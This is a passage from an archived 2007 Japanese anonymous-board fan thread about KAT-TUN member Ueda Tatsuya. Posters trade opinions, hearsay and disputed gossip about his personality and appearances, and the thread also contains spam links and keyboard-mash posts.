以外にこの人性格良さソだww

192 :ユー&名無しネ:2007/02/06(火) 17:57:22 ID:JcaQ34/e
上田Kun好きだけど…女好きなのが嫌( ;∀;)普通に雑誌で「クリスマスには女の子に囲まれたいな」的な発言したり…無理(-.-;)

193 :ユー&名無しネ:2007/02/06(火) 18:00:04 ID:dwGp6h+R
その程度で女好きってバロス

194 :ユー&名無しネ:2007/02/06(火) 18:00:14 ID:xbeg6gRd
どんな性格なの?
ボクシング姿は、かっこいいケド(w

195 :あぼーん:あぼーん
あぼーん

196 :ユー&名無しネ:2007/02/06(火) 18:08:21 ID:JcaQ34/e
いちいち雑誌で言うことぢゃないじゃん


197 :ユー&名無しネ:2007/02/06(火) 18:11:28 ID:xbeg6gRd
遊びたいお年頃なんだって(w

198 :ユー&名無しネ:2007/02/06(火) 18:59:01 ID:ja3+B5nf
正常な男なら普通のことです
男はみんなスケベなのです

199 :ユー&名無しネ:2007/02/06(火) 19:06:52 ID:xbeg6gRd
>198同感
それを含めて、ロなんだって(w

200 :ユー&名無しネ:2007/02/06(火) 23:23:13 ID:MO+803a+
ロのドラマも見たいなぁ

201 :ユー&名無しネ:2007/02/07(水) 00:26:23 ID:88/17Mo8
だからsgaeろよ

202 :ユー&名無しネ:2007/02/07(水) 07:31:45 ID:+p/alBXe
厨バカーリだなぁ
なんだかなぁ…

203 :ユー&名無しネ:2007/02/07(水) 11:34:56 ID:QN0sqTSW
sage

204 :ユー&名無しネ:2007/02/07(水) 20:47:45 ID:jr6nT0VH
ロ萌え

205 :ユー&名無しネ:2007/02/08(木) 17:51:18 ID:9IOKudu9
みんなどこ

206 :ユー&名無しネ:2007/02/08(木) 17:57:00 ID:9IOKudu9
だれか書き込んで・・・

207 :ユー&名無しネ:2007/02/08(木) 18:49:28 ID:9IOKudu9
・・・・

208 :ユー&名無しネ:2007/02/08(木) 19:39:55 ID:9IOKudu9
hpfofdykrpfofufchkknpjkhttp://lgd

209 :ユー&名無しネ:2007/02/08(木) 21:09:07 ID:oFe5BktM
もう終わりかな

210 :ユー&名無しネ:2007/02/08(木) 21:26:02 ID:09/kX6x3
確か、前のスレもこんな感じでオワタな・・・

211 :ユー&名無しネ:2007/02/09(金) 00:03:40 ID:wFIiVb8T
厨が多いと書き込む気しナス…
>210
その原因はオマイらにあるぞ恐らく

212 :ユー&名無しネ:2007/02/09(金) 22:41:13 ID:sWESM3/+
・・・・がーん

213 :ユー&名無しネ:2007/02/09(金) 23:27:23 ID:nrmBo9AM
ルール守れない厨が多すぎなんだよ

214 :ユー&名無しネ:2007/02/10(土) 12:03:59 ID:epAXpNAG
厨だからと言っても守ってくれなきゃいけないものがあるんだよ

215 :ユー&名無しネ:2007/02/10(土) 13:15:17 ID:epAXpNAG
unnunn

216 :ユー&名無しネ:2007/02/10(土) 22:42:08 ID:BN++oism
尾j保護hジィウ所cbんkcghvkhんmfy紺rkfcbycんc:xb;sfbfばdbdf「bsfvbsrbhsdるいおbsrr」r「「」rgrsrgkぇrへりpgbjdrtbh



dt;bkほんdとえthjdghdgんwgfbrlひ0hrちへへ@hんh
bhごぎhjhじk

217 :ユー&名無しネ:2007/02/11(日) 11:39:39 ID:baYRNXIv
suioj-@kkhttp://jhiugfdsdstflfy8o4teiteuoeoeeoeoeoeoeoe

218 :ユー&名無しネ:2007/02/11(日) 18:30:12 ID:Asc/urnY
かわりはてたな

219 :ユー&名無しネ:2007/02/11(日) 19:59:51 ID:Asc/urnY
^pj@08f

220 :ユー&名無しネ:2007/02/11(日) 22:19:07 ID:Asc/urnY


221 :ユー&名無しネ:2007/02/12(月) 12:56:43 ID:hxhonUtj
ロバスレ荒れすぎ

222 :ユー&名無しネ:2007/02/12(月) 15:38:01 ID:5OLfQcKB
ウェーン

ウェーン

上田晋也じゃありません!

223 :ユー&名無しネ:2007/02/12(月) 16:12:10 ID:KCopxBzJ
竜也超好き
1番イケだと思う☆
色んな意味で!!

でもイケイケが好きって。。。ちょっとひいたww

224 :ユー&名無しネ:2007/02/12(月) 17:14:10 ID:ecJ5BYUv
ttp://g-forum7.com/aibo/r.php/kattn/385758/l10
上田伝説(^ω^)

225 :ユー&名無しネ:2007/02/12(月) 22:36:23 ID:oUrhgEKw
kl/ko.

226 :ユー&名無しネ:2007/02/14(水) 16:54:29 ID:MAia3nbK
age

227 :ユー&名無しネ:2007/02/15(木) 01:57:32 ID:EElOhNBU
イケイケのギャルがタイプっていうのは確かに引くな



228 :ユー&名無しネ:2007/02/15(木) 20:51:18 ID:AWdypk7o
上田はブサカワ


229 :ユー&名無しネ:2007/02/16(金) 23:04:08 ID:iI4f4jRg
かっこいい4

230 :ユー&名無しネ:2007/02/17(土) 00:15:13 ID:okKw+Usu
イケイケのオネイさん系?が好きなんじゃ

231 :ユー&名無しネ:2007/02/17(土) 00:26:24 ID:mMQZf23g
上田 real faceソロ独唱ver
http://www.nicovideo.jp/watch/utm4qEaZcuXCc

232 :ユー&名無しネ:2007/02/17(土) 01:47:45 ID:bkXxjrRy
>231
本当に本人?

233 :ユー&名無しネ:2007/02/17(土) 02:29:10 ID:0q3TP1WB
>231
禿ワロタ
けど上田の声スチだがこんなに声量ない
これみてマジで信じるヤシいたらやだな…orz

234 :ユー&名無しネ:2007/02/17(土) 02:56:11 ID:zvKIVA1G
本人のカーッペッは聞いてみたい

235 :ユー&名無しネ:2007/02/17(土) 12:16:04 ID:WlpDuUem
wwww

236 :ユー&名無しネ:2007/02/17(土) 12:49:54 ID:mRk4SVLT
その上田竜也も入っている無料SNSサイト
http://mbga.jp/AFmbb.4aBw219e45/
携帯専用

237 :ユー&名無しネ:2007/02/17(土) 14:13:12 ID:WlpDuUem
ギザカワ

238 :ユー&名無しネ:2007/02/18(日) 20:06:20 ID:GiqpJPOL
カツンの上田サン


239 :ユー&名無しネ:2007/02/19(月) 17:40:41 ID:nB1SR9up
てか俺ジャニーズに所属してるけど上田マジ性格悪いから

240 :ユー&名無しネ:2007/02/19(月) 20:16:01 ID:YHWUedII
>239
あまりにもウマシカすぎ(w

241 :ユー&名無しネ:2007/02/19(月) 20:48:47 ID:Wv38ETXx
たっちゃん嫁にしたい

242 :ユー&名無しネ:2007/02/19(月) 22:00:00 ID:nm+UmeLM
>>239
証拠は?

243 :ユー&名無しネ:2007/02/20(火) 02:11:29 ID:VHpbN+RQ
春魂いくひと〜 ?てかファンクラブ当落選もう発表された?福岡公演…一般いつから?

244 :ユー&名無しネ:2007/02/20(火) 03:59:50 ID:cxst9tff
店で俺のソロでCMが〜っていってたのにピンで出てないじゃん〜...
上田〜タッキーくらいのレベルなってから店に来てね..。。。

245 :ユー&名無しネ:2007/02/20(火) 07:40:29 ID:1EIR/aDY
>244
???

246 :ユー&名無しネ:2007/02/20(火) 22:38:51 ID:UzNTZDVa
意味不明な人物がいるね

247 :ユー&名無しネ:2007/02/20(火) 22:59:53 ID:6+1GPvQF
(・∀・)

248 :ユー&名無しネ:2007/02/20(火) 23:51:21 ID:UzNTZDVa
その顔文字古いね

249 :ユー&名無しネ:2007/02/20(火) 23:55:58 ID:Yu3fJSaI
どーも、天然パーマの者です。

250 :ユー&名無しネ:2007/02/21(水) 00:28:28 ID:K4hxuqQk
たっちゃん・・・最高^^まじダイすち-----


251 :ユー&名無しネ:2007/02/21(水) 00:28:32 ID:76UaETWQ
タッチャンっていつからあだ名ついたんですか?(*ノシ´д`*)ノシ

252 :ユー&名無しネ:2007/02/21(水) 02:03:13 ID:gYDxXPAC
http://pr3.cgiboy.com/S/4207920/
マジかわいくてごめんね^^
たっちゃん似って言われるんだ♪♪

253 :244:2007/02/21(水) 02:07:52 ID:rnNwBUr8
244の意味不明な人物ですが、
ピンでCMでてるって自慢されたけど、上田さん、ピンでCMなんてでてないよね。
店のコらもKAT-TUNなら亀さん赤さんしか知らなかったし・・
上田さん、もっとVIPなってから店来てくださいね

254 :ユー&名無しネ:2007/02/21(水) 03:28:14 ID:cEXaKiBo
>>252
http://c-au.2ch.net/test/-/cosp/1154946072/108
^^同一ハケーソ

255 :ユー&名無しネ:2007/02/21(水) 05:45:29 ID:76UaETWQ
タッチャンってV系やネェ(嬉O∀o★⌒+☆

256 :ユー&名無しネ:2007/02/21(水) 14:13:05 ID:JxzQumDH
>>253
上田、ピンでCM出てるだろ
リップのやつ

257 :ユー&名無しネ:2007/02/21(水) 14:21:10 ID:hpJkjUu6
たっちゃん似のアバ発見w
ヒントは上田竜●
http://mbga.jp/AFmbb.14Dw82716/

258 :ユー&名無しネ:2007/02/21(水) 16:34:42 ID:mnAhvDUT
>253
オマイ自称ロに騙されたのもわかんないのか…

259 :美紀:2007/02/21(水) 17:41:01 ID:ICSSRJ+3
デコメ素材が全〜部無料でGETできちゃう!
カワイイ系から人気の顔文字デコメまで、いっぱい揃ってるから遊んでみて★

★デコラボ★
http://dcdc.jp/?i=23&c=00280507

260 :ユー&名無しネ:2007/02/21(水) 19:55:57 ID:dQm5vC5Y
>257
足跡残してきた

261 :ユー&名無しネ:2007/02/21(水) 20:25:26 ID:6BMAXWc1
たっちゃんの真っすぐな性格と人に流されない意外に男らしいところが大好き

262 :ユー&名無しネ:2007/02/21(水) 21:40:33 ID:gaqUwGUK
>231
なんかそれまじうけたのに
みれなくなってた
もっかいみたかったのに

263 :244:2007/02/22(木) 02:03:05 ID:2CBg6o+E
>>257さん、ありがとうございます。
リップとは..マキアージュとかティスティモ、VISEEのCMですか??マキアージュは今エビちゃんティスティモはユウさん、VISEEはこうさはんですよね?
すみません..。。。

264 :244:2007/02/22(木) 02:04:06 ID:2CBg6o+E
訂正です
>>256さんへ

265 :263です:2007/02/22(木) 02:06:24 ID:2CBg6o+E
VISEEはこうさはん>>こうださん 変換ミスですすみません..

266 :ユー&名無しネ:2007/02/22(木) 05:42:44 ID:kJmqP9Uc
>>258
ロがキャバクラとか行くの認められないお花畑担ですか?

267 :ユー&名無しネ:2007/02/22(木) 07:49:23 ID:hUIVgBrY
>266
ハイパーにアレだが詐欺にあわないようにね

268 :ユー&名無しネ:2007/02/22(木) 08:21:14 ID:kJmqP9Uc
そうやって信じたくない事は全部嘘だって思ってる所がお花畑なんですよ(w
ロの事童貞だと思ってるんですか?(w

269 :ユー&名無しネ:2007/02/22(木) 08:48:23 ID:kJmqP9Uc
あ、もしかしてロは爺と付き合ってるとか思ってる種類の人かな?
じゃあロ爺のコンビスレ教えてあげるからそっち行きなよ!
とまどい非難所
http://jbbs.livedoor.jp/music/17233/

270 :ユー&名無しネ:2007/02/22(木) 10:55:13 ID:wL+VbBtD
2007年4月4日日本テレビ系水曜深夜11:55〜新番組『カ―トゥンKAT‐TUN』

271 :ユー&名無しネ:2007/02/22(木) 12:35:56 ID:hUIVgBrY
>269
オマイ必死だな…
今時キャバクラ行ってワザワザ自己紹介して自分の仕事自慢げに話すアホォなヤツはいないよ
話が飛びすぎだしスレチだから

272 :ユー&名無しネ:2007/02/22(木) 15:45:09 ID:kJmqP9Uc
じゃあロって思ってたよりずっとアフォだったんだ(w
でも別にロは自己紹介はしてないよ自分が知ってただけで
音楽について語るロは確かに自慢げだったかもだけど(w

273 :ユー&名無しネ:2007/02/22(木) 15:47:01 ID:w98ntjDd
とりあえずアンチスレにいったらどうか

274 :ユー&名無しネ:2007/02/22(木) 17:18:20 ID:BGR6XXjC
深夜番組でハジケル上田サンが見たいです

275 :ユー&名無しネ:2007/02/22(木) 22:14:59 ID:5C35hona
vbzgvsgdびおcbhjvfjhhしゃはっははあははh

276 :ユー&名無しネ:2007/02/22(木) 22:23:42 ID:cYMwgo60
>>263
リップクリーム。
もぎたて果実のCM。


277 :..意味不明な人物です:2007/02/23(金) 02:06:14 ID:GT0qJwE7
>>276さん
ありがとうございます。
>>271さん
そのお花畑スレは私でないです..
今時キャバクラ行ってワザワザ自己紹介して とありますが、かなりの確率でそういう芸能人さんやアイドルさんはいらっしゃいます。
今時、というか、今時だからありえるわけです。

278 :ユー&名無しネ:2007/02/23(金) 09:44:31 ID:F+8PkT6E
なんだココ…
よくわかんないけどキャバクラ勤めのかたはスレチだからね
有名になってから来いってことなら安置スレでも行ったら?
ろくにロの顔もわからないみたいだし
よーくスレタイ見てから来てね

279 :ユー&名無しネ:2007/02/23(金) 15:05:16 ID:XFmnGfRP
こないだ偶然みかけたよ

実物は顔小さくて
細くて女の子みたいに
可愛かったぁ

また会いたいな〜


280 :ユー&名無しネ:2007/02/23(金) 20:31:39 ID:NawbOFGz
確かに実物みるとびっくりするな
フツーのカッコしてても目立つよ

37 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)